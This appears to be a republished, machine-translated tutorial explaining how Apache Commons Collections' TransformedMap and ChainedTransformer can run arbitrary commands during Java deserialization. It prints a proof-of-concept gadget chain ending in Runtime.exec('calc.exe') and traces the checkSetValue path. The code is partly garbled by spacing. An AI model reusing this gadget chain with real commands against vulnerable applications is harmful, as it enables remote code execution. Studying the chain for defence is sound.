Java deserialization-how transformedMap classes can execute malicious code 03/29 Update SLTechnology News&Howtos

Java deserialization-how transformedMap classes can execute malicious code

2025-03-29 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Java deserialization-the principle that the transformedMap class can execute malicious code: 0x00 code Map map=new HashMap (); map.put ("key", "value"); / / call the target object's toString method String command= "calc.exe"; final String [] execArgs = new String [] {command} Final Transformer [] transformers = new Transformer [] {new ConstantTransformer (Runtime.class), new InvokerTransformer ("getMethod", new Class [] {String.class, Class [] .class}, new Object [] {"getRuntime", new Class [0]}), new InvokerTransformer ("invoke") New Class [] {Object.class, Object [] .class}, new Object [] {null, new Object [0]}), new InvokerTransformer ("exec", new Class [] {String.class}, execArgs)} Transformer transformer=new ChainedTransformer (transformers); Map transformedMap=TransformedMap.decorate (map,null,transformer); for (Map.Entry entry:transformedMap.entrySet ()) {System.out.println (entry); entry.setValue ("anything");}

Execution result:

Why can the 0x01 transformedMap class execute malicious code?

From the last https://blog.51cto.com/13770310/2160737 article, you know that ChainedTransformer's transformer method can execute malicious code.

The key to the above code is:

For (Map.Entry entry:transformedMap.entrySet ()) {System.out.println (entry); entry.setValue ("anything");}

Why does executing entry.setValue ("anything"); cause malicious code execution? Next, let's look at the checkSetValue method of the transformedMap class:

/ * Override to transform the value when using setValue. * * @ param value the value to transform * @ return the transformed value * @ since Commons Collections 3.1 * / protected Object checkSetValue (Object value) {return valueTransformer.transform (value);}

When the transformedMap object executes the setValue method, the transform method of valueTransformer is called. If the incoming valueTransformer is an object of ChainedTransformer, it can cause malicious code to execute.

Then look at the above code:

So the core of the code is still the transformer method of ChainedTransformer.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.